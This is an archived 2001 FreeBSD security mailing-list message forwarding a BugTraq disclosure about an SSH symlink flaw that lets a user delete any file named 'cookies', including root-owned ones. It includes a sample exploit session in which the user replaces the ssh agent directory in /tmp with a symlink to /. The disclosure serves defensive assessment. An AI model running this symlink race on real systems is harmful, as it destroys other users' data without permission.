Date: Wed, 6 Jun 2001 12:47:02 +0300 From: Valentin Nechayev <netch@lucky.net> To: security@freebsd.org Subject: [fwd] SSH allows deletion of other users files... Message-ID: <20010606124702.A30808@lucky.net>
next in thread | raw e-mail | index | archive | help
--7JfCtLOvnd9MIVvH Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Is it applicable to FreeBSD? (BugTraq contains report that it is) /netch --7JfCtLOvnd9MIVvH Content-Type: message/rfc822 Content-Disposition: inline Return-Path: <bugtraq-return-246-netch=lucky.net@securityfocus.com> Received: from outgoing3.securityfocus.com [66.38.151.27] by burka.carrier.kiev.ua with ESMTP id SHL33333 for <netch@lucky.net>; Mon, 4 Jun 2001 18:19:18 +0300 (EEST) (envelope-from bugtraq-return-246-netch=lucky.net@securityfocus.com) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by outgoing.securityfocus.com (Postfix) with SMTP id 42FFBA54B0 for <netch@lucky.net>; Mon, 4 Jun 2001 09:19:10 -0600 (MDT) Received: (qmail 17878 invoked by alias); 4 Jun 2001 14:55:02 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm Precedence: bulk List-Id: <bugtraq.list-id.securityfocus.com> List-Post: <mailto:bugtraq@securityfocus.com> List-Help: <mailto:bugtraq-help@securityfocus.com> List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com> List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com> Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Received: (qmail 10486 invoked from network); 4 Jun 2001 10:12:01 -0000 Date: Mon, 4 Jun 2001 22:14:29 +1200 (NZST) From: <zen-parse@gmx.net> X-X-Sender: <zen-parse@clarity.local> To: <bugtraq@securityfocus.com> Subject: SSH allows deletion of other users files... Message-ID: <Pine.LNX.4.33.0106042203210.13293-100000@clarity.local> Mime-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=koi8-u SSH allows deletion of other users files. ========================================= You can delete any file on the filesystem you want... as long as its called cookies. Not really a very useful bug, but could cause annoyances to people who actually like their cookies. /home/zen/.netscape/cookies sample exploit:- [root@clarity /root]# touch /cookies;ls /cookies /cookies [root@clarity /root]# ssh zen@localhost zen@localhost's password: Last login: Mon Jun 4 20:22:39 2001 from localhost.local Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9 [zen@clarity zen]$ logout Connection to localhost closed. [root@clarity /root]# ls /cookies /bin/ls: /cookies: No such file or directory --zen-parse --7JfCtLOvnd9MIVvH-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010606124702.A30808>